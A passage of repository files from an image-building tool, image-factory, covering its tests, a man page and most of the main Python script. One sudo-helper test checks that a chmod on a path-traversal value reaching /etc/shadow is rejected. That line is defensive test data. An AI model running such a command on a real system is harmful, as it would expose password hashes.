\"o+rwx\", \"/tmp/image-factory._3gm0lem/root\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_var_log(self):\n \"\"\"Test write access for mounted /var/log/...\"\"\"\n cmd = [\"chmod\", \"o+w\", \"/tmp/image-factory.8a9573rd/var/log\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_dnf_log(self):\n \"\"\"Test read access for dnf log file.\"\"\"\n cmd = [\"chmod\", \"o+r\", \"/tmp/image-factory.umh1oz39/var/log/anaconda/dnf.librepo.log\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_log_file(self):\n \"\"\"Test read access for mounted /var/log/...\"\"\"\n cmd = [\"chmod\", \"o+r\", \"/tmp/image-factory._3gm0lem/var/log/anaconda/journal.log\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_recursive(self):\n \"\"\"Test chmod recursively\"\"\"\n cmd = [\"chmod\", \"-R\", \"o+rwx\", \"/tmp/image-factory._3gm0lem/var/log/anaconda\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_remove_root(self):\n \"\"\"Test chmod remove mounted /root permission\"\"\"\n cmd = [\"chmod\", \"o-rwx\", \"/tmp/image-factory._3gm0lem/root\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_umount(self):\n \"\"\"Test unmounting.\"\"\"\n cmd = [\"umount\", \"/tmp/image-factory._3gm0lem\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_reject_escaping(self):\n \"\"\"Test rejecting ../../etc/shadow.\"\"\"\n cmd = [\"chmod\", \"o+rwx\", \"/tmp/image-factory._3gm0lem/../../etc/shadow\"]\n self.assertEqual(self.call_helper(cmd, silence=True), 1)\n" }, { "alpha_fraction": 0.6975964307785034, "alphanum_fraction": 0.7026271820068359, "avg_line_length": 40.604652404785156, "blob_id": "64caad75f36ddb4bdc7d8a6dda716d734c1a0b86", "content_id": "21a3bdf8edc7dbc9da2a665f5145d76e45d848e9", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1789, "license_type": "permissive", "max_line_length": 91, "num_lines": 43, "path": "/tests/test_isort.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2021, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all 
copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH\n# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\n# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,\n# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\n# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR\n# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\n# PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Run isort to check if Python import definitions are sorted.\"\"\"\n\nimport subprocess\nimport sys\nimport unittest\n\nfrom . import get_source_files, unittest_verbosity\n\n\nclass IsortTestCase(unittest.TestCase):\n \"\"\"\n This unittest class provides a test that runs isort to check if\n Python import definitions are sorted. The list of source files\n is provided by the get_source_files() function.\n \"\"\"\n\n def test_isort(self):\n \"\"\"Test: Run isort on Python source code.\"\"\"\n\n cmd = [\"isort\", \"--check-only\", \"--diff\", \"-l\", \"99\"] + get_source_files()\n if unittest_verbosity() >= 2:\n sys.stderr.write(f\"Running following command:\\n{' '.join(cmd)}\\n\")\n with subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True\n ) as process:\n output = process.communicate()[0].decode()\n\n if process.returncode != 0: # pragma: no cover\n self.fail(f\"isort found unsorted Python import definitions:\\n{output.strip()}\")\n" }, { "alpha_fraction": 0.7496473789215088, "alphanum_fraction": 0.7559943795204163, "avg_line_length": 24.781818389892578, "blob_id": "9ba695415ba882b7347c4d24044cd5bd575b1976", "content_id": "58068b20a91ef24a9d91dbfd0e8e7d90cc600ac4", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1418, "license_type": "permissive", "max_line_length": 78, "num_lines": 55, "path": "/image-factory-sudo-helper.1.md", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "---\ndate: 2020-08-05\nfooter: image-factory-sudo-helper\nheader: \"image-factory-sudo-helper's Manual\"\nlayout: page\nlicense: 'Licensed under the ISC license'\nsection: 1\ntitle: IMAGE-FACTORY-SUDO-HELPER\n---\n\n# NAME\n\nimage-factory-sudo-helper - Run certain commands as root\n\n# SYNOPSIS\n\n**image-factory-sudo-helper** **COMMAND**\n\n# DESCRIPTION\n\n**image-factory** can be run as normal user, but it need root permission for a\nfew operations like chmod, mount, and umount. Since these operations cannot be\nsecured with sudo's wildcards, **image-factory-sudo-helper** was introduced to\ncheck the commands using regular expression.\n\n**image-factory-sudo-helper** will take a command (including parameters) and\nchecks if it one of the three allowed commands:\n\n* chmod on files or (sub-)directories in /tmp/image-factory\n\n* mount of loop device in /tmp/image-factory\n\n* umount in /tmp/image-factory\n\nIf the given command passes is one of the allowed commands, it will be\nexecuted. Otherwise an error message will be printed.\n\n# USAGE\n\nTo allow running **image-factory** as normal user, only\n**image-factory-sudo-helper** needs sudo permission for the user. 
Example sudo\nconfiguration for user *jenkins*:\n\n```\njenkins ALL = NOPASSWD:SETENV: /usr/bin/image-factory-sudo-helper\n```\n\n# ENVIRONMENT\n\nIf the environment variable **DRYRUN** is set, the given command will not be\nexecuted but printed instead.\n\n# AUTHOR\n\nBenjamin Drung <[email protected]>\n" }, { "alpha_fraction": 0.6634935736656189, "alphanum_fraction": 0.6692051291465759, "avg_line_length": 35.859649658203125, "blob_id": "d3ca42350bcd388a7190108b79596ae90b302ed1", "content_id": "4b68a54303cef422badfbd281918c567b4e4f9f2", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2101, "license_type": "permissive", "max_line_length": 83, "num_lines": 57, "path": "/tests/__init__.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2017-2021, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Helper functions for testing.\"\"\"\n\nimport inspect\nimport os\nimport unittest\n\n\ndef get_source_files():\n \"\"\"Return a list of sources files/directories (to check with flake8/pylint).\"\"\"\n scripts = [\"image-factory\"]\n modules = [\"tests\"]\n py_files = []\n\n files = []\n for code_file in scripts + modules + py_files:\n is_script = code_file in scripts\n if not os.path.exists(code_file): # pragma: no cover\n # The alternative path is needed for Debian's pybuild\n alternative = os.path.join(os.environ.get(\"OLDPWD\", \"\"), code_file)\n code_file = alternative if os.path.exists(alternative) else code_file\n if is_script:\n with open(code_file, \"rb\") as script_file:\n shebang = script_file.readline().decode(\"utf-8\")\n if \"python\" in shebang:\n files.append(code_file)\n else:\n files.append(code_file)\n return files\n\n\ndef unittest_verbosity():\n \"\"\"\n Return the verbosity setting of the currently running unittest.\n\n If no test is running, return 0.\n \"\"\"\n frame = inspect.currentframe()\n while frame:\n self = frame.f_locals.get(\"self\")\n if isinstance(self, unittest.TestProgram):\n return self.verbosity\n frame = frame.f_back\n return 0 # pragma: no cover\n" }, { "alpha_fraction": 0.5823896527290344, "alphanum_fraction": 0.5932517051696777, "avg_line_length": 44.547367095947266, "blob_id": "930f1ccafad5fe089f2e231d602ad4495611f601", "content_id": "a7d1ad29385a0dec4e257df156ee6353086dd6a8", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4327, "license_type": "permissive", "max_line_length": 97, "num_lines": 95, "path": "/tests/test_cli.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2019, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or 
without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Test command-line related functions from image-factory.\"\"\"\n\nimport configparser\nimport os\nimport unittest\nimport unittest.mock\n\nfrom image_factory import get_config, override_configs_by_args, parse_args\n\n\nclass TestCLI(unittest.TestCase):\n \"\"\"\n This unittest class tests command-line related functions from image-factory.\n \"\"\"\n\n @unittest.mock.patch(\"os.getuid\", unittest.mock.MagicMock(return_value=1000))\n def test_empty_config(self):\n \"\"\"Test empty configuration file.\"\"\"\n args = parse_args([\"Debian-10-server\"])\n config = configparser.ConfigParser()\n override_configs_by_args(config, args)\n self.assertTrue(config.has_section(\"Debian-10-server\"))\n self.assertEqual(\n config.items(\"Debian-10-server\"), [(\"cache_dir\", \"~/.cache/image-factory\")]\n )\n\n @unittest.mock.patch(\"os.getuid\", unittest.mock.MagicMock(return_value=1000))\n def test_example_config(self):\n \"\"\"Test exapmle image-factory.conf file.\"\"\"\n config_file = os.path.join(os.path.dirname(__file__), \"..\", \"image-factory.conf\")\n os.environ[\"IMAGE_FACTORY_CONFIG\"] = config_file\n args = parse_args([\"--format\", \"raw\", \"Debian-10-server\"])\n config = get_config()\n override_configs_by_args(config, args)\n self.assertTrue(config.has_section(\"Debian-10-server\"))\n self.assertEqual(\n config.items(\"Debian-10-server\"),\n [\n (\"data_dir\", \"/usr/share/image-factory\"),\n (\"cores\", \"1\"),\n (\"format\", \"raw\"),\n (\"keep-raw\", \"False\"),\n (\"installer-logs\", \"True\"),\n (\"log-file\", \"True\"),\n (\"ram\", \"1G\"),\n (\"centos_mirror\", \"http://ftp.rz.uni-frankfurt.de/pub/mirrors/centos\"),\n (\"debian_mirror\", \"rsync://ftp.de.debian.org/debian\"),\n (\"ubuntu_mirror\", \"http://de.archive.ubuntu.com/ubuntu\"),\n (\"fedora_mirror\", \"rsync://ftp.fau.de/fedora\"),\n (\"opensuse_mirror\", \"rsync://ftp.halifax.rwth-aachen.de/opensuse\"),\n (\"dist\", \"buster\"),\n (\n \"initrd\",\n \"rsync://ftp.de.debian.org/debian/dists/buster/main/installer-amd64/\"\n \"current/images/netboot/debian-installer/amd64/initrd.gz\",\n ),\n (\n \"linux\",\n \"rsync://ftp.de.debian.org/debian/dists/buster/main/installer-amd64/\"\n \"current/images/netboot/debian-installer/amd64/linux\",\n ),\n (\"preseed\", \"/usr/share/image-factory/Debian-10-server-de.cfg\"),\n (\n \"append\",\n \"auto-install/enable=true keymap=us hostname=debian \"\n \"domain=unassigned-domain vga=771 d-i -- quiet\",\n ),\n (\"vnc\", \"localhost:13\"),\n (\"cache_dir\", \"~/.cache/image-factory\"),\n ],\n )\n\n def test_override_cache_dir(self):\n \"\"\"Test overriding the cache directory.\"\"\"\n args = parse_args([\"--cache-dir\", \"/var/cache/example\", \"Debian-10-server\"])\n config = configparser.ConfigParser()\n config[config.default_section] = {}\n config[config.default_section][\"cache_dir\"] = \"~/.cache/image-factory\"\n override_configs_by_args(config, args)\n 
self.assertTrue(config.has_section(\"Debian-10-server\"))\n self.assertEqual(config.items(\"Debian-10-server\"), [(\"cache_dir\", \"/var/cache/example\")])\n" }, { "alpha_fraction": 0.5966116786003113, "alphanum_fraction": 0.6020557284355164, "avg_line_length": 37.043277740478516, "blob_id": "c9741d97f9db580eefd612b1fca2dcbc86a2513b", "content_id": "f8dffe09d51ad1662a8b65005c2b331c50dd3ec5", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24614, "license_type": "permissive", "max_line_length": 99, "num_lines": 647, "path": "/image-factory", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\n# Copyright (C) 2014-2020, IONOS SE\n# Author: Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n# pylint: disable=invalid-name\n# pylint: enable=invalid-name\n\nimport argparse\nimport configparser\nimport datetime\nimport errno\nimport glob\nimport hashlib\nimport logging\nimport os\nimport re\nimport shutil\nimport stat\nimport subprocess\nimport sys\nimport tempfile\n\nimport httplib2\nimport parted\n\nDEFAULT_IMAGE_SIZE = \"2G\"\nDEFAULT_LOGGING_FORMAT = \"%(asctime)s %(name)s [%(process)d] %(levelname)s: %(message)s\"\nGUEST_HTTP_SERVER = \"10.0.2.4\"\n_UNSET = object()\nLOSETUP = \"/sbin/losetup\"\nZEROFREE = \"/usr/sbin/zerofree\"\n__logger_name__ = os.path.basename(sys.argv[0]) if __name__ == \"__main__\" else __name__\n\n\ndef get_config():\n \"\"\"Return a config parser object.\n\n The configuration is tried to be read in this order:\n 1) User configuration file: ~/.config/image-factory.conf\n 2) System configuration file: /etc/image-factory.conf\n\n You can override the usage of the configuration files from\n point 1 and 2 by specifying a configuration file in the\n IMAGE_FACTORY_CONFIG environment variable.\n \"\"\"\n config = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation())\n env_name = \"IMAGE_FACTORY_CONFIG\"\n if env_name in os.environ:\n config_files = [os.environ[env_name]]\n if not os.path.isfile(config_files[0]):\n raise Exception(\n \"'\" + config_files[0] + \"' (set in \" + env_name + \") is not a valid file.\"\n )\n else:\n config_files = [\n \"/etc/image-factory.conf\",\n os.path.expanduser(\"~/.config/image-factory.conf\"),\n ]\n config.read(config_files)\n return config\n\n\ndef call_command(command, as_root=False):\n \"\"\"Run a given command and check if the command returns 0. 
Otherwise fail.\"\"\"\n if as_root and os.getuid() != 0:\n command = [\"sudo\", \"image-factory-sudo-helper\"] + command\n escaped_command = []\n for argument in command:\n if \" \" in argument:\n escaped_command.append('\"' + argument.replace('\"', r\"\\\"\") + '\"')\n else:\n escaped_command.append(argument)\n logger = logging.getLogger(__logger_name__)\n logger.info(\"Calling %s\", \" \".join(escaped_command))\n return_code = subprocess.call(command)\n if return_code != 0:\n logger.error(\"'%s' failed with exit code %i.\", \" \".join(command), return_code)\n sys.exit(return_code)\n\n\ndef create_raw_image(filename, size):\n \"\"\"Create a virtual raw image.\"\"\"\n cmd = [\"qemu-img\", \"create\", \"-f\", \"raw\", filename, size]\n call_command(cmd)\n\n\ndef create_url(image):\n return \"http://\" + GUEST_HTTP_SERVER + \"/\" + image\n\n\ndef get_default_cache_dir():\n \"\"\"Return the default cache directory.\"\"\"\n if os.getuid() == 0:\n cache_dir = \"/var/cache/image-factory\"\n else:\n cache_dir = \"~/.cache/image-factory\"\n return cache_dir\n\n\ndef cache_file(cache_dir, source):\n \"\"\"Cache a file locally and return the relative location of the cached file.\"\"\"\n logger = logging.getLogger(__logger_name__)\n if not os.path.exists(cache_dir):\n logger.info(\"Creating directory %s\", cache_dir)\n os.makedirs(cache_dir)\n relative_destination = os.path.basename(source)\n destination = os.path.join(cache_dir, relative_destination)\n if source.startswith(\"file:\") or source.startswith(\"/\"):\n logger.info(\"Copying '%s' to cache '%s'...\", source, destination)\n shutil.copy(source, destination)\n elif source.startswith(\"http:\") or source.startswith(\"https:\"):\n logger.info(\"Downloading %s...\", source)\n http_client = httplib2.Http(cache_dir)\n http_client.ignore_etag = True\n (response, content) = http_client.request(source)\n if response.fromcache:\n logger.info(\"Copy cached download to %s...\", destination)\n else:\n logger.info(\"Save download to %s...\", destination)\n with open(destination, \"wb\") as cached_file:\n cached_file.write(content)\n elif source.startswith(\"rsync:\"):\n call_command([\"rsync\", \"--no-motd\", source, destination])\n else:\n raise Exception(f\"No download handler for file '{source}' found.\")\n return relative_destination\n\n\ndef download_and_publish(config, image, source, filename):\n destination = os.path.join(config.get(\"http\", \"path\"), image, filename)\n target_dir = os.path.dirname(destination)\n logger = logging.getLogger(__logger_name__)\n if not os.path.exists(target_dir):\n logger.info(\"Creating directory %s\", target_dir)\n os.makedirs(target_dir)\n if source.startswith(\"file:\") or source.startswith(\"/\"):\n logger.info(\"Copying %s to %s\", source, destination)\n shutil.copyfile(source, destination)\n elif source.startswith(\"http:\") or source.startswith(\"https:\"):\n logger.info(\"Downloading %s...\", source)\n http_client = httplib2.Http(os.path.join(config[image][\"cache_dir\"], image))\n http_client.ignore_etag = True\n (response, content) = http_client.request(source)\n if response.fromcache:\n logger.info(\"Copy cached download to %s...\", destination)\n else:\n logger.info(\"Save download to %s...\", destination)\n with open(destination, \"wb\") as cached_file:\n cached_file.write(content)\n elif source.startswith(\"rsync:\"):\n call_command([\"rsync\", \"--no-motd\", source, destination])\n else:\n raise Exception(f\"No download handler for file '{source}' found.\")\n return destination\n\n\ndef 
check_one_partition(partitions, image):\n \"\"\"Checks that the image has only one partition.\n\n The image-handler (that adds the root password and SSH keys to instantiate\n the template) requires that there is only one partition in the image.\n \"\"\"\n if len(partitions) != 1:\n if partitions:\n msg = f\"{len(partitions)} partitions ({', '.join(partitions)})\"\n else:\n msg = \"no partitions\"\n logger = logging.getLogger(__logger_name__)\n logger.error(\"Expected exactly one partition in %s, but found %s.\", image, msg)\n sys.exit(1)\n\n\ndef parse_bytes(data):\n \"\"\"Parse bytes from given string.\n\n The SI prefixes (kB, MB, etc.) and binary prefixes (KiB, MiB, etc.) are supported.\n For backward compatibility, the units K, M, and G are mapped to KiB, MiB, and GiB.\n \"\"\"\n match = re.match(r\"^([0-9]+)\\s*([kMGTPE]?B|[KMGTPE]iB|[KMGTPE])$\", data.strip())\n if not match:\n raise ValueError(\n f\"Failed to parse bytes from '{data}'. \"\n \"Please use SI or binary prefixes for bytes (e.g. '2 GB' or '512 MiB').\"\n )\n\n value = int(match.group(1))\n unit = match.group(2)\n if unit.endswith(\"iB\"):\n value *= 1 << (10 * {\"KiB\": 1, \"MiB\": 2, \"GiB\": 3, \"TiB\": 4, \"PiB\": 5, \"EiB\": 6}[unit])\n elif unit.endswith(\"B\"):\n value *= 10 ** (3 * {\"\": 0, \"kB\": 1, \"MB\": 2, \"GB\": 3, \"TB\": 4, \"PB\": 5, \"EB\": 6}[unit])\n else:\n value *= 1 << (10 * {\"K\": 1, \"M\": 2, \"G\": 3, \"T\": 4, \"P\": 5, \"E\": 6}[unit])\n return value\n\n\ndef get_session():\n \"\"\"Return the session to use with virt-install.\"\"\"\n if os.getuid() == 0:\n session = \"qemu:///system\"\n else:\n session = \"qemu:///session\"\n return session\n\n\ndef run_installation(config, image, image_name): # pylint: disable=too-many-locals\n cores = config.get(image, \"cores\", fallback=\"1\")\n ram_in_mib = parse_bytes(config.get(image, \"ram\")) >> 20\n\n cache_dir = os.path.join(config[image][\"cache_dir\"], image)\n if config.has_option(image, \"installer_image\"):\n installer_image = cache_file(cache_dir, config.get(image, \"installer_image\"))\n location = os.path.join(cache_dir, installer_image)\n else:\n initrd = cache_file(cache_dir, config.get(image, \"initrd\"))\n kernel = cache_file(cache_dir, config.get(image, \"linux\"))\n location = f\"{cache_dir},kernel={kernel},initrd={initrd}\"\n\n append = config.get(image, \"append\", fallback=\"\")\n if config.has_option(image, \"preseed\"):\n initrd_inject = config.get(image, \"preseed\")\n append = f\"preseed/url=file:///{os.path.basename(initrd_inject)} {append}\"\n if config.has_option(image, \"kickstart\"):\n initrd_inject = config.get(image, \"kickstart\")\n append = f\"ks=file:///{os.path.basename(initrd_inject)} {append}\"\n append = f\"inst.ks=file:///{os.path.basename(initrd_inject)} {append}\"\n if config.has_option(image, \"yast\"):\n initrd_inject = config.get(image, \"yast\")\n append = f\"autoyast=file:///{os.path.basename(initrd_inject)} {append}\"\n\n network = \"user,model=virtio\"\n if config.has_option(image, \"mac\"):\n network += \",mac=\" + config.get(image, \"mac\")\n\n graphics = \"none\"\n if config.has_option(image, \"vnc\"):\n listen, port = config.get(image, \"vnc\").split(\":\")\n graphics = f\"vnc,port={5900 + int(port)}\"\n if listen:\n graphics += f\",listen={listen}\"\n\n session = get_session()\n cmd = [\n \"virt-install\",\n \"--connect\",\n session,\n \"--noreboot\",\n \"--wait\",\n \"-1\",\n \"--name\",\n image_name,\n \"--vcpus\",\n cores,\n \"--memory\",\n str(ram_in_mib),\n \"--disk\",\n \"path=\" + image_name 
+ \",bus=virtio,format=raw\",\n \"--network\",\n network,\n \"--graphics\",\n graphics,\n \"--console\",\n \"pty,target_type=serial\",\n \"--noautoconsole\",\n \"--location\",\n location,\n \"--extra-args\",\n append,\n \"--initrd-inject\",\n initrd_inject,\n ]\n\n try:\n call_command(cmd)\n except KeyboardInterrupt:\n call_command([\"virsh\", \"-c\", session, \"destroy\", image_name])\n raise\n finally:\n call_command([\"virsh\", \"-c\", session, \"undefine\", image_name])\n\n\ndef open_as_user(filename, encoding):\n # pylint: disable=consider-using-with\n try:\n fileobject = open(filename, encoding=encoding)\n except IOError as error:\n if error.errno == errno.EACCES:\n call_command([\"chmod\", \"o+r\", filename], as_root=True)\n fileobject = open(filename, encoding=encoding)\n else:\n raise\n return fileobject\n\n\ndef remove(path, recursive=False):\n logger = logging.getLogger(__logger_name__)\n parent_dir = os.path.dirname(path)\n missing_permission = not os.access(parent_dir, os.W_OK)\n if missing_permission:\n # Assert that others cannot write (so we correct remove the other write bits later again)\n assert os.stat(parent_dir).st_mode & stat.S_IWOTH == 0\n call_command([\"chmod\", \"o+w\", parent_dir], as_root=True)\n try:\n if os.path.isdir(path):\n logger.info(\"Removing directory %s\", path)\n if recursive:\n call_command([\"chmod\", \"-R\", \"o+rwx\", path], as_root=True)\n shutil.rmtree(path)\n else:\n os.rmdir(path)\n else:\n logger.info(\"Removing file %s\", path)\n os.remove(path)\n finally:\n if missing_permission:\n call_command([\"chmod\", \"o-w\", parent_dir], as_root=True)\n\n\ndef remove_logs(tmpdir, print_installer_logs):\n root_dir = os.path.join(tmpdir, \"root\")\n missing_permission = not os.access(root_dir, os.W_OK)\n if missing_permission:\n # Assert that others cannot read/write/execute.\n # Then we can correctly remove the permissions again later (without altering the state).\n assert os.stat(root_dir).st_mode & (stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH) == 0\n call_command([\"chmod\", \"o+rwx\", root_dir], as_root=True)\n\n try:\n # Fix read permission for log directories (that we will remove later)\n check_directories = glob.glob(os.path.join(tmpdir, \"var/adm/autoinstall/*\")) + glob.glob(\n os.path.join(tmpdir, \"var/log/YaST2\")\n )\n for directory in check_directories:\n if os.path.isdir(directory) and not os.access(directory, os.R_OK):\n call_command([\"chmod\", \"-R\", \"o+rx\", directory], as_root=True)\n\n # Print installer logs\n installer_logs = (\n glob.glob(os.path.join(tmpdir, \"root/anaconda-ks.cfg\"))\n + glob.glob(os.path.join(tmpdir, \"var/adm/autoinstall/logs/*\"))\n + glob.glob(os.path.join(tmpdir, \"var/log/anaconda.*\"))\n + glob.glob(os.path.join(tmpdir, \"var/log/anaconda/*\"))\n + glob.glob(os.path.join(tmpdir, \"var/log/installer/syslog\"))\n + glob.glob(os.path.join(tmpdir, \"var/log/YaST2/y2log\"))\n )\n if print_installer_logs:\n logger = logging.getLogger(__logger_name__)\n for installer_log in installer_logs:\n content = open_as_user(installer_log, encoding=\"utf-8\").read()\n logger.info(\"Content of /%s:\\n%s\", os.path.relpath(installer_log, tmpdir), content)\n\n # Remove installer logs\n remove_log_globs = [\n \"root/anaconda-ks.cfg\",\n \"root/install.log*\",\n \"var/adm/autoinstall\",\n \"var/lib/YaST2\",\n \"var/log/anaconda\",\n \"var/log/installer\",\n \"var/log/YaST2\",\n ]\n for log_glob in remove_log_globs:\n for log in glob.glob(os.path.join(tmpdir, log_glob)):\n remove(log, recursive=True)\n finally:\n if 
missing_permission:\n call_command([\"chmod\", \"o-rwx\", root_dir], as_root=True)\n\n\ndef post_installation(script_name, image, print_installer_logs):\n logger = logging.getLogger(__logger_name__)\n device = parted.getDevice(image)\n try:\n disk = parted.Disk(device)\n except parted.DiskLabelException as error:\n logger.error(\"Failed to read the disk: %s. Maybe the disk is still empty?\", error)\n sys.exit(1)\n check_one_partition(disk.partitions, image)\n partition = disk.partitions[0]\n offset = partition.geometry.start * device.sectorSize\n loopdev = None\n try:\n cmd = [LOSETUP, \"-o\", str(offset), \"--show\", \"-f\", image]\n logger.info(\"Calling %s\", \" \".join(cmd))\n with subprocess.Popen(cmd, stdout=subprocess.PIPE) as process:\n loopdev = process.communicate()[0].decode().strip()\n\n tmpdir = tempfile.mkdtemp(prefix=script_name + \".\")\n call_command([\"mount\", loopdev, tmpdir], as_root=True)\n\n try:\n remove_logs(tmpdir, print_installer_logs)\n finally:\n call_command([\"umount\", tmpdir], as_root=True)\n shutil.rmtree(tmpdir)\n\n call_command([ZEROFREE, loopdev])\n\n finally:\n if loopdev:\n cmd = [LOSETUP, \"-d\", loopdev]\n logger.info(\"Calling %s\", \" \".join(cmd))\n return_code = subprocess.call(cmd)\n if return_code != 0:\n logger.warning(\"losetup failed with exit code %i.\", return_code)\n\n\ndef create_hashsum(image):\n logger = logging.getLogger(__logger_name__)\n logger.info(\"Calculating SHA 256 sum of %s...\", image)\n with open(image, \"rb\") as image_file:\n sha256_sum = hashlib.sha256(image_file.read()).hexdigest()\n logger.info(\"SHA 256 sum of %s: %s\", image, sha256_sum)\n with open(image + \".sha256sum\", \"w\", encoding=\"utf-8\") as checksum_file:\n checksum_file.write(sha256_sum + \" \" + image + \"\\n\")\n\n\ndef create_qcow2(image, keep_raw_image):\n qcow2_name = os.path.splitext(image)[0] + \".qcow2\"\n call_command([\"qemu-img\", \"convert\", \"-O\", \"qcow2\", image, qcow2_name])\n if not keep_raw_image:\n try:\n logger = logging.getLogger(__logger_name__)\n logger.info(\"Removing %s...\", image)\n os.remove(image)\n except FileNotFoundError:\n pass\n create_hashsum(qcow2_name)\n return qcow2_name\n\n\ndef upload_image(config, image, image_file, checksum_file):\n \"\"\"Try to upload the image.\n\n Upload the image to all destinations that are listed in 'upload_destinations'.\n The 'upload_destinations' variable is a comma-separated list of sections.\n To disable the upload, leave 'upload_destinations' undefined or set it to an empty string.\n Every section has to set 'upload_type' and 'upload_target'. You can specify\n 'upload_args', 'post-upload-command', and 'post-upload-command' with a number suffix\n (counting up from 1). 
${image} can be used as a parameter in post-upload-command.\n \"\"\"\n logger = logging.getLogger(__logger_name__)\n destinations = config.get(image, \"upload_destinations\", fallback=\"\").split(\",\")\n for destination in [d.strip() for d in destinations if d.strip() != \"\"]:\n try:\n upload_type = config.get(destination, \"upload_type\")\n except (configparser.NoOptionError, configparser.NoSectionError):\n logger.error(\n \"No 'upload_type' defined in the upload destination section '%s'.\", destination\n )\n sys.exit(1)\n if upload_type.lower() == \"rsync\":\n try:\n upload_target = config.get(destination, \"upload_target\")\n except (configparser.NoOptionError, configparser.NoSectionError):\n logger.error(\n \"No 'upload_target' defined in the upload destination section '%s'.\",\n destination,\n )\n sys.exit(1)\n command = [\"rsync\"]\n if config.has_option(destination, \"upload_args\"):\n command += [\n a for a in config.get(destination, \"upload_args\").split(\" \") if a.strip() != \"\"\n ]\n command += [image_file, checksum_file, upload_target]\n call_command(command)\n logger.info(\"Successfully uploaded %s to %s\", image_file, upload_target)\n\n if config.has_option(destination, \"post-upload-command\"):\n config.set(destination, \"image\", image_file)\n command = [\n a\n for a in config.get(destination, \"post-upload-command\").split(\" \")\n if a.strip() != \"\"\n ]\n call_command(command)\n\n i = 1\n while config.has_option(destination, \"post-upload-command\" + str(i)):\n config.set(destination, \"image\", image_file)\n command = 